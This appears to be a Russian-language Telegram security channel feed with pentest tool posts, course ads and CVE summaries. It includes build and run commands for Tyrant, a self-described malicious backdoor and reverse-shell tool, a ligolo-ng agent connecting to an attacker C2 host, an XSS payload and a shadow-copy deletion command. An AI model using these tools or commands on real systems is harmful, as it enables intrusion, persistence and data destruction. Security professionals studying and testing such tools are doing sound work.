Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!
🌍 Категория Веб — Музей
——————————————
🗂 В архив добавлены задания + райтапы:
🔵 Веб - RevengeNinja
Приятного хакинга!
——————————————
🗂 В архив добавлены задания + райтапы:
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥13❤7👍6
Gixy — это open source-анализатор конфигураций Nginx, который помогает находить потенциальные уязвимости, ошибки и небезопасные настройки. Инструмент особенно полезен как для DevOps задач так и для проведения пентеста web-инфраструктуры. Он автоматически проверяет конфигурационные файлы и выявляет проблемы, которые могут привести к утечкам данных, обходу ограничений или выполнению вредоносных запросов.
Основные возможности
Gixy анализирует конфигурацию Nginx и применяет набор правил для поиска проблем:
Инструмент находит проблемы, связанные с:
Установка
pip3 install gixy-next
Запуск проверки
gixy /etc/nginx/nginx.conf
Проверка директории
gixy /etc/nginx/
#nginx #security #devops #pentest #web #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12🔥6👍5
Пользуясь случаем, хотим поделиться с вами мощным отзывом на наш курс по веб-пентесту!
Один из наших выпускников подробно разобрал, как проходит обучение, что реально даёт результат и почему курс часто рекомендуют даже опытные специалисты, за что мы очень благодарны!
👉 обучение строится вокруг практики — от SQLi и XSS до SSRF, SSTI, CMDi, LFI и построения цепочек до RCE
👉 каждую неделю проходят вебинары с куратором, где можно разобрать сложные моменты и задать любые вопросы
👉 обратная связь не формальная — наставники помогают 24/7
👉 финальный модуль — полноценная практика ручного поиска уязвимостей
Получился максимально подробный и честный отзыв: https://teletype.in/@fnay_offensive/post_20
Новый поток стартует 16 апреля.
В программе — практические задания, регулярные вебинары с кураторами и постепенное погружение в сценарии эксплуатации.
#отзывы
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍8🔥8👎3🍌1
#leakbase #russia #police
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19👀7❤5🔥5👎3
ParamSpider: Инструмент для извлечения URL из веб-архивов
👉 Основные функции
- Cбор ссылок из Wayback Machine для указанного домена
- Автоматическое исключение статических и неинтересных расширений (изображения, стили, скрипты)
- Поддержка сканирования нескольких доменов из файла
- Отображение URL в реальном времени
- Возможность работы через прокси-сервер
- Замена значений параметров для последующего фаззинга
⬇️ Установка
Проверка
⏺️ Поиск URL для одного домена
Результат сохраняется в файл results/example.com.txt
⏺️ Поиск URL для нескольких доменов из файла
Файл domains.txt должен содержать список доменов (по одному на строку)
⏺️ Потоковый вывод в терминал
URL отображаются в реальном времени без сохранения в файл
⏺️ Использование прокси
⏺️ Настройка плейсхолдера для параметров
Значение плейсхолдера используется для замены значений параметров, что удобно для последующего тестирования на XSS или другие инъекции
🔎 ParamSpider часто используется в комбинации с инструментами для:
- Фаззинга параметров (ffuf, wfuzz)
- Проверки доступности (httpx, httprobe)
- Сканирования уязвимостей (nuclei, dalfox)
- Анализа параметров (kxss, gf)
#ParamSpider #Fuzzing #WaybackMachine #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
ParamSpider — утилита с открытым исходным кодом, предназначенная для извлечения URL-адресов, связанных с целевым доменом, из веб-архивов (Wayback Machine). Инструмент автоматически фильтрует «неинтересные» URL, позволяя исследователям безопасности сосредоточиться на потенциально значимых конечных точках для дальнейшего анализа, фаззинга и тестирования.
- Cбор ссылок из Wayback Machine для указанного домена
- Автоматическое исключение статических и неинтересных расширений (изображения, стили, скрипты)
- Поддержка сканирования нескольких доменов из файла
- Отображение URL в реальном времени
- Возможность работы через прокси-сервер
- Замена значений параметров для последующего фаззинга
sudo apt install paramspider
Проверка
paramspider -h
paramspider -d example.com
Результат сохраняется в файл results/example.com.txt
paramspider -l domains.txt
Файл domains.txt должен содержать список доменов (по одному на строку)
paramspider -d example.com -s
URL отображаются в реальном времени без сохранения в файл
paramspider -d example.com --proxy '127.0.0.1:7890'
paramspider -d example.com -p '"><h1>reflection</h1>'
Значение плейсхолдера используется для замены значений параметров, что удобно для последующего тестирования на XSS или другие инъекции
- Фаззинга параметров (ffuf, wfuzz)
- Проверки доступности (httpx, httprobe)
- Сканирования уязвимостей (nuclei, dalfox)
- Анализа параметров (kxss, gf)
#ParamSpider #Fuzzing #WaybackMachine #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🔥7❤6
enject — это open source-инструмент, который скрывает чувствительные данные из .env файлов, предотвращая их утечку при работе с AI, логированием и сторонними сервисами. Ранее проект назывался enveil.
Вместо хранения секретов в открытом виде:
Инструмент действует как промежуточный слой между приложением и секретами:
В результате:
Клонирование репозитория
git clone https://github.com/greatscott/enject
cd enject
cargo build --release
Настройка окружения
cd your-project
enject init
Дальше инструмент интегрируется в процесс запуска приложения и начинает фильтровать доступ к секретам.
#security #devsecops #env #secrets #privacy #ai #tool #infosec
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥7👍3🤔3
Tyrant
📐 Основные характеристики:
📉 Reverse shell: позволяет злоумышленнику инициировать сеанс командной оболочки с указанным UID пользователя, получая соответствующие привилегии.
📉 Внедрение и сохранение бэкдора: внедряет бэкдор в целевую систему и обеспечивает сохранение контроля даже после перезагрузки системы.
📉 Загрузка веб-оболочки Tyrant: загружает и запускает обратную оболочку Tyrant через веб-доступ.
📉 Шифрование и поддельные протоколы: использует поддельные токены JWT и зашифрованную связь для обхода обнаружения системы безопасности.
🖱 Восстановление по SSH: позволяет злоумышленнику повторно подключиться и восстановить бэкдор через SSH.
⬇️ Установка:
0️⃣ Клонирование репозитория и переход в рабочую директорию:
1️⃣ Установка зависимостей:
2️⃣ Компиляция бинарного файла:
⛓️💥 Запуск:
#web
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Tyrant — это вредоносный инструмент, используемый для тестирования на проникновение и обеспечения постоянного присутствия под удаленным управлением, обладающий обширными возможностями.
git clone https://github.com/MartinxMax/Tyrant.git
cd Tyrant/
sudo apt-get install zlib1g-dev libzstd-dev libssl-dev
gcc -static -o tyrant tyrant.c ./lib/core.c ./lib/random_md5.c -lssl -lcrypto -lz -lzstd
./tyrant -uid [UID] -rhost [RHOST] -rport [RPORT]
#web
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍7🔥7
Источник: https://www.justice.gov/usao-edmi/pr/russian-cybercriminal-sentenced-prison-using-botnet-steal-millions-american-businesses
#russia #usa #hacker #ta551
Please open Telegram to view this post
VIEW IN TELEGRAM
❤15😁11🔥5👍4😍3👀2👌1
☁️ADPulse
Вместе со сканером безопасности на странице инструмента также представлен скрипт PowerShell с названием test_environment.ps1, с помощью которого можно настроить собственный уязвимый контроллер домена для проведения тестирования.
Как это работает?
1️⃣ Подключение — ADPulse связывается с целевым контроллером домена по протоколу LDAPS (порт 636) с автоматическим переключением на LDAP (порт 389). Попытка аутентификации осуществляется с помощью NTLM и протокола SIMPLE bind.
2️⃣ Сканирование — каждая из 35 функций проверки запрашивает данные из AD через LDAP и, в случае определенных проверок, выполняет дополнительные операции: легкие сетевые проверки (SMBv1, подписание, нулевые сессии) обнаруженных хостов, обход файловой системы SYSVOL для определения учетных данных GPP и анализ данных DACL для проверок, связанных с ACL.
3️⃣ Оценка — результатам присваивается степень критичности и вычитается определенное количество баллов из общей оценки.
Все операции выполняются только с доступом на чтение. ADPulse не изменяет объекты Active Directory, членство в группах, объекты групповой политики или списки управления доступом.
⬇️ Установка
Форматы отчетов
➡️ Вывод в консоль — вывод в терминале с цветовой кодировкой, позволяющий быстро увидеть критические результаты и ключевые моменты;
➡️ JSON — машиночитаемый экспорт для интеграции с системами управления ИБ и событиями безопасности, системами обработки заявок или пользовательскими информационными панелями;
➡️ HTML — автономный отчет в темной цветовой гамме со сворачиваемыми разделами, значками уровня критичности, карточками со статистикой, шкалой оценки и списком шаблонов ADCS.
🧿 Оценка уровня критичности обнаружений
За каждую обнаруженную мисконфигурацию вычитается определенное количество баллов. Общая оценка начинается со 100 и уменьшается за каждое обнаружение:
📉 80–100 — Низкий — хорошая система безопасности c незначительными проблемами;
📉 60–79 — Средний — существенные недостатки, которые необходимо устранить;
📉 40–59 — Высокий — присутствуют значительные уязвимости;
🖱 0–39 — Критический — серьезные риски, которые требуют немедленного устранения.
Использование
❗️ Для работы с ADPulse требуются действительные учетные данные домена.
1️⃣ Базовое сканирование. Все три формата отчетов по умолчанию создаются в папке Reports/.
2️⃣ Сканирование с указанием IP DC, генерацией отчета только в формате HTML в директории /tmp/scans.
#tools #AD #pentesting #infrastructure
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Инструмент с открытым исходным кодом, предназначенный для аудита безопасности Active Directory, который подключается к контроллеру домена и выполняет 35 автоматических проверок безопасности. Дает быструю оценку неправильных конфигураций Active Directory, а также ищет уязвимые места в инфраструктуре.
Вместе со сканером безопасности на странице инструмента также представлен скрипт PowerShell с названием test_environment.ps1, с помощью которого можно настроить собственный уязвимый контроллер домена для проведения тестирования.
Как это работает?
Все операции выполняются только с доступом на чтение. ADPulse не изменяет объекты Active Directory, членство в группах, объекты групповой политики или списки управления доступом.
# Клонируем репозиторий
git clone https://github.com/yourorg/adpulse.git
cd adpulse
# (Recommended) Создаем виртуальное окружение
python -m venv venv
source venv/bin/activate # Linux / macOS
venv\Scripts\activate # Windows
# Устанавливаем зависимости
pip install -r requirements.txt
Форматы отчетов
За каждую обнаруженную мисконфигурацию вычитается определенное количество баллов. Общая оценка начинается со 100 и уменьшается за каждое обнаружение:
Использование
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!'
python ADPulse.py --domain corp.local --user jsmith --password 'P@ssw0rd!' --dc-ip 10.0.0.1 --report html --output-dir /tmp/scans
#tools #AD #pentesting #infrastructure
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10🔥6👍4
Один клик — и роутер под контролем атакующего
💀 Открыл письмо, кликнул по ссылке — браузер молча отправил POST-запрос на 192.168.1.1. Без пароля. Без уведомления. Добро пожаловать в CVE-2025-15101.
🔍 Связка CSRF + OS Command Injection в роутерах ASUS (прошивка
• httpd на ASUS работает от root — команды уходят сразу с максимальными привилегиями
• сессия админа в AsusWRT не истекает часами — окно атаки всегда открыто
• нет WAF, CSP, SIEM — атака проходит в тишине
⚠️ Аналогичный паттерн в AsusWRT фиксировали ещё в 2018-м. Номера CVE меняются — архитектура нет.
Полный разбор kill chain, лабораторный стенд и чеклист митигации:
https://codeby.net/threads/cve-2025-15101-csrf-os-command-injection-v-routerakh-asus-polnaya-karta-uyazvimosti-ot-klika-do-root-shell.92554/
💀 Открыл письмо, кликнул по ссылке — браузер молча отправил POST-запрос на 192.168.1.1. Без пароля. Без уведомления. Добро пожаловать в CVE-2025-15101.
🔍 Связка CSRF + OS Command Injection в роутерах ASUS (прошивка
3.0.0.6_102 и ниже) даёт атакующему root shell через браузер жертвы. Почему это критично:• httpd на ASUS работает от root — команды уходят сразу с максимальными привилегиями
• сессия админа в AsusWRT не истекает часами — окно атаки всегда открыто
• нет WAF, CSP, SIEM — атака проходит в тишине
⚠️ Аналогичный паттерн в AsusWRT фиксировали ещё в 2018-м. Номера CVE меняются — архитектура нет.
Полный разбор kill chain, лабораторный стенд и чеклист митигации:
https://codeby.net/threads/cve-2025-15101-csrf-os-command-injection-v-routerakh-asus-polnaya-karta-uyazvimosti-ot-klika-do-root-shell.92554/
👍9❤7🔥4🤯1
MESH — это open source-инструмент для удалённой форензики мобильных устройств и сетевого мониторинга через зашифрованную peer-to-peer сеть. Он позволяет анализировать устройства (Android / iOS), даже если к ним нет прямого доступа.
Вместо VPN и централизованных серверов используется overlay mesh-сеть:
В основе — модифицированный протокол Tailscale с self-hosted control plane и разделением управления и трафика.*Ephemeral-сети — это временные сети, которые создаются под конкретную задачу
MESH создаёт распределённую сеть из трёх компонентов:
При этом:
Это позволяет:
git clone https://github.com/BARGHEST-ngo/MESH.git
cd mesh/control-plane
docker-compose up -d
https://localhost:3000/login
docker exec headscale headscale apikeys create --expiration 90d
После этого можно подключать устройства и начинать форензику.
#mesh #p2p #forensics #mobile #privacy #security #blueteam #dfir #threatintel
Please open Telegram to view this post
VIEW IN TELEGRAM
❤13👍8🔥8🤔2🌚1
Простой, легкий и быстрый инструмент, который позволяет пентестерам создавать туннели на основе обратного TCP/TLS-соединения с использованием интерфейса tun (без необходимости в SOCKS). Поддерживаются протоколы TCP, UDP, ICMP.
Пакеты, отправляемые в TUN-интерфейс при запуске прокси-сервера, транслируются и затем передаются в удалённую сеть агента.
Например, для TCP-соединения процесс работает следующим образом:
Такой механизм позволяет использовать инструменты, например Nmap, без необходимости использования proxychains.
Можно произвести установку из репозитория Kali Linux :
apt install ligolo-ng. Или собрать через go:
go build -o agent cmd/agent/main.go
go build -o proxy cmd/proxy/main.go
При использовании в Linux необходимо создать интерфейс tun на прокси-сервере:
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up
Далее необходимо запустить прокси-сервер на своем сервере (порт по умолчанию 11601):
./proxy -autocert
./proxy -selfcert
После этого запускается агент на целевой системе:
./agent -connect attacker_c2_server.com:11601
После подключения агента на прокси-сервере появится новая сессия:
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000
Через команду
session необходимо выбрать нужного агента и далее запустить туннелирование на прокси-сервере, используя имя интерфейса.#tools #tun #pentest #network
Please open Telegram to view this post
VIEW IN TELEGRAM
❤12👍8🔥6
Друзья, напоминаем, на каких курсах начинается обучение в апреле! 🚗
Старт 6 апреля:
🙂 🙃 😄 🥲 🙂 ☺️ 😀 ⤵️
✨ Курс «Профессия аналитик центра мониторинга безопасности (SOC)» — запускаем новый курс. Это возможность войти в профессию с нуля: на курсе освоите работу с инцидентами ИБ, научитесь выявлять атаки и анализировать события.
Старт 16 апреля:
✨ Курс «Тестирование Веб-приложений на проникновение (WAPT)» — отработаем полный цикл тестирования: от разведки до пост-эксплуатации.
Старт 20 апреля:
✨ Курс «OSINT: технология боевой разведки» — освоим профессиональный поиск информации и анализ данных из открытых источников.
Старт 27 апреля:
✨ Курс «Профессия DevSecOps - инженер: безопасная разработка» — освоим DevSecOps-инженерию: от автоматизации безопасности до работы с Kubernetes и Terraform.
✨ Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)» — ищем и анализируем следы кибервзломов (анализ артефактов, работа с opensource инструментами).
🪧 Запишитесь у нашего менеджера @CodebyAcademyBot
Или узнайте подробности и программы курсов — на нашем➡️ сайте
Старт 6 апреля:
Старт 16 апреля:
Старт 20 апреля:
Старт 27 апреля:
Или узнайте подробности и программы курсов — на нашем
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍6✍3🔥2
Forwarded from Hacker Lab
🚩 Новые задания на платформе HackerLab!
👩💻 Категория Pentest Machines — Грузоперевозки
Приятного хакинга!
Приятного хакинга!
Please open Telegram to view this post
VIEW IN TELEGRAM
❤9👍5🔥3
Forwarded from Hacker Lab
В HackerLab запускается сертификация. На текущий момент сертификат доступен участникам, успешно завершившим курс SQL Injection Master и сдавшим итоговый экзамен.
Экзамен представляет собой практическую эксплуатацию уязвимостей в изолированной инфраструктуре. Вы не отвечаете на вопросы - вы атакуете систему, находите уязвимости и шаг за шагом развиваете атаку.
Это не просто «галочка», а результат, подтверждённый практикой.
PRO20
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16🔥9❤4👎2🎉2😎1
Zero-click через стикер: 9.8 и молчание Telegram
Получил стикер — устройство скомпрометировано. Без клика, без уведомления. Именно это описывает ZDI-CAN-30207 — и именно это Telegram отрицает.
🔍 Оценка CVSS 9.8 — не маркетинг. Математика за ней конкретна: метрика
⚙️ Аналог по вектору — CVE-2019-3568, buffer overflow в WhatsApp VoIP: идентичный CVSS, идентичная схема. Статус ZDI-CAN-30207 сейчас — disputed: ZDI верифицировал, вендор отрицает. Разбираем CVSS-математику, хронологию disclosure и методы инструментирования клиента для мониторинга.
Полный разбор:
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
Получил стикер — устройство скомпрометировано. Без клика, без уведомления. Именно это описывает ZDI-CAN-30207 — и именно это Telegram отрицает.
🔍 Оценка CVSS 9.8 — не маркетинг. Математика за ней конкретна: метрика
UI:N (zero-click) даёт коэффициент 0.85 вместо 0.62 при клике. Разница — 9.8 против 8.1. Оба сценария критичны, но zero-click означает массовую эксплуатацию без единого действия жертвы.⚙️ Аналог по вектору — CVE-2019-3568, buffer overflow в WhatsApp VoIP: идентичный CVSS, идентичная схема. Статус ZDI-CAN-30207 сейчас — disputed: ZDI верифицировал, вендор отрицает. Разбираем CVSS-математику, хронологию disclosure и методы инструментирования клиента для мониторинга.
Полный разбор:
https://codeby.net/threads/zero-day-v-telegram-zdi-can-30207-razbor-uyazvimosti-telegram-zero-day-s-otsenkoi-cvss-9-8.92557/
❤6❤🔥1
Бэкап — цель номер один 🎯
Шифровальщик отработал за 47 минут. Когда команда полезла восстанавливаться — репозиторий Veeam зашифрован, каталог tape-библиотеки удалён, VSS-снимки стёрты за двое суток до запуска payload.
Это не баг шифровальщика — это Recovery Denial: атакующие методично уничтожают бэкапы до старта шифрования. По данным Mandiant M-Trends 2025, уничтожение возможностей восстановления — одна из самых частых тактик ransomware-группировок. Бэкап — не страховка, а первая мишень. 🔥
Что делают атакующие в первую очередь:
•
• Останавливают службы Veeam и удаляют SQL-каталог
• Ищут Veeam-серверы через AD и ломятся по доменным учёткам.
Подробный разбор:
https://codeby.net/threads/recovery-denial-zashchita-rezervnykh-kopii-ot-ransomware-taktiki-atakuyushchikh-i-metody-protivodeistviya.92571/
Шифровальщик отработал за 47 минут. Когда команда полезла восстанавливаться — репозиторий Veeam зашифрован, каталог tape-библиотеки удалён, VSS-снимки стёрты за двое суток до запуска payload.
Это не баг шифровальщика — это Recovery Denial: атакующие методично уничтожают бэкапы до старта шифрования. По данным Mandiant M-Trends 2025, уничтожение возможностей восстановления — одна из самых частых тактик ransomware-группировок. Бэкап — не страховка, а первая мишень. 🔥
Что делают атакующие в первую очередь:
•
vssadmin delete shadows — VSS за дни до шифрования• Останавливают службы Veeam и удаляют SQL-каталог
• Ищут Veeam-серверы через AD и ломятся по доменным учёткам.
Подробный разбор:
https://codeby.net/threads/recovery-denial-zashchita-rezervnykh-kopii-ot-ransomware-taktiki-atakuyushchikh-i-metody-protivodeistviya.92571/
❤5👎1🔥1😁1👀1
PacketSender: Утилита для отправки и приема сетевых пакетов
🎇 Основные функции
- Поддержка протоколов (TCP, UDP, SSL (TLS), HTTP/HTTPS)
- Режимы работы - клиент (отправка) и сервер (прослушивание)
- Генератор интенсивного трафика (нагрузочное тестирование с настраиваемой скоростью)
- Поддержка макросов (подстановка даты, времени, счетчика и случайных значений)
- Панели управления - создание кнопочных панелей для быстрого выполнения команд
⬇️ Установка
Проверка
1️⃣ Примеры использования CLI
⏺️ Отправка UDP
⏺️ Режим сервера (прослушивание TCP)
⏺️ Генератор интенсивного трафика (20 Гц)
⏺️ Отладка сетевого сервера
⏺️ Проверка SSL/TLS соединения
⏺️ Нагрузочное тестирование
2️⃣ Использование графического интерфейса (GUI). Основные элементы:
▶️ Поля ввода (имя пакета, данные (ASCII/HEX), адрес, порт)
▶️ Выбор протокола (TCP, UDP, SSL, HTTP GET, HTTP POST)
▶️ Таблица сохраненных пакетов - двойной клик для редактирования
▶️ Кнопка отправки - выполнение выбранного пакета
▶️ Лог трафика (отображение отправленных и полученных данных)
▶️ Индикаторы серверов (UDP, TCP, SSL серверы с отображением портов)
#PacketSender #NetworkTesting #TCP #UDP #pentest #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
PacketSender — это кроссплатформенное приложение с открытым исходным кодом, предназначенное для отправки и приема TCP, UDP, SSL-пакетов, а также HTTP/HTTPS-запросов. Инструмент предоставляет графический интерфейс и возможности командной строки, позволяя тестировать сетевое взаимодействие, отлаживать серверные приложения и выполнять диагностику сетевых протоколов.
- Поддержка протоколов (TCP, UDP, SSL (TLS), HTTP/HTTPS)
- Режимы работы - клиент (отправка) и сервер (прослушивание)
- Генератор интенсивного трафика (нагрузочное тестирование с настраиваемой скоростью)
- Поддержка макросов (подстановка даты, времени, счетчика и случайных значений)
- Панели управления - создание кнопочных панелей для быстрого выполнения команд
sudo apt install packetsender
Проверка
packetsender —h
packetsender -u 192.168.1.100 8080 "Hello UDP"
packetsender -l -t -b 8080
packetsender --rate 20 --name "Test Packet"
#режим сервера для приема данных
packetsender -l -t -b 9999
#отправка тестовых данных из другого окна
packetsender -t localhost 9999 "TEST"
packetsender -s expired.packetsender.com 443 "GET / HTTP/1.0\r\n\r\n"
packetsender --bps 1000000 --num 10000 --name "Status Check"
#PacketSender #NetworkTesting #TCP #UDP #pentest #tool
Please open Telegram to view this post
VIEW IN TELEGRAM
❤10👍6🔥4😁1
PentestAgent
⏺️ PentestAgent — это передовой фреймворк для автоматизированного пентеста, который использует большие языковые модели (LLM) и мультиагентную архитектуру для выполнения задач по тестированию на проникновение с минимальным участием человека. Существует две основные версии продукта: академическая (исследовательский проект) и практическая (инструмент для реального использования).
🧠 Академическая версия:
Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent
Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
➡️ Общая успешность: 74.2% (у GPT-3.5 — 60.6%)
➡️ Простые задачи: 100% завершения на этапах разведки и анализа
➡️ Сложные задачи: успешность снижается до 50% на этапе разведки
Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.
🔑 Практическая версия:
Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.
❗️ Требования: Python 3.10+, API ключ OpenAI, Anthropic или другого провайдера (поддерживается LiteLLM)
⛓️💥 Запуск:
Режим работы:
⏺️ /assist - Единичный запрос с выполнением инструментов
⏺️ /agent - Автономное выполнение одной задачи
⏺️ /crew - Мультиагентный режим
⏺️ /interact - Интерактивный режим с подсказками
❓ Как считаете, способен данный продукт полностью автоматизировать пентест?
#pentestagemt #ai #pentest #python #openai
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
Это оригинальный проект, представленный на конференции ACM AsiaCCS группой исследователей из Северо-Западного университета, Чжэцзянского университета и Ant Group. Фреймворк построен на мультиагентной коллаборации, где каждый агент отвечает за свой этап пентеста в соответствии со стандартом PTES (Penetration Testing Execution Standard): Reconnaissance Agent, Search Agent, Planning Agent и Execution Agent
Исследователи создали бенчмарк на основе 67 целей из VulHub и HackTheBox (различные CWE и уровни сложности). Результаты при использовании GPT-4 :
Сравнение с PentestGPT показало значительное преимущество в скорости: этап разведки занял 220 секунд против 1199 секунд.
Параллельно с академическим проектом существует активно развивающийся open-source инструмент от сообщества GH05TCREW на GitHub.
git clone https://github.com/GH05TCREW/pentestagent.git
cd pentestagent
./scripts/setup.sh
pentestagent -t 192.168.1.1
Режим работы:
#pentestagemt #ai #pentest #python #openai
Please open Telegram to view this post
VIEW IN TELEGRAM
❤8🔥4👍3😁2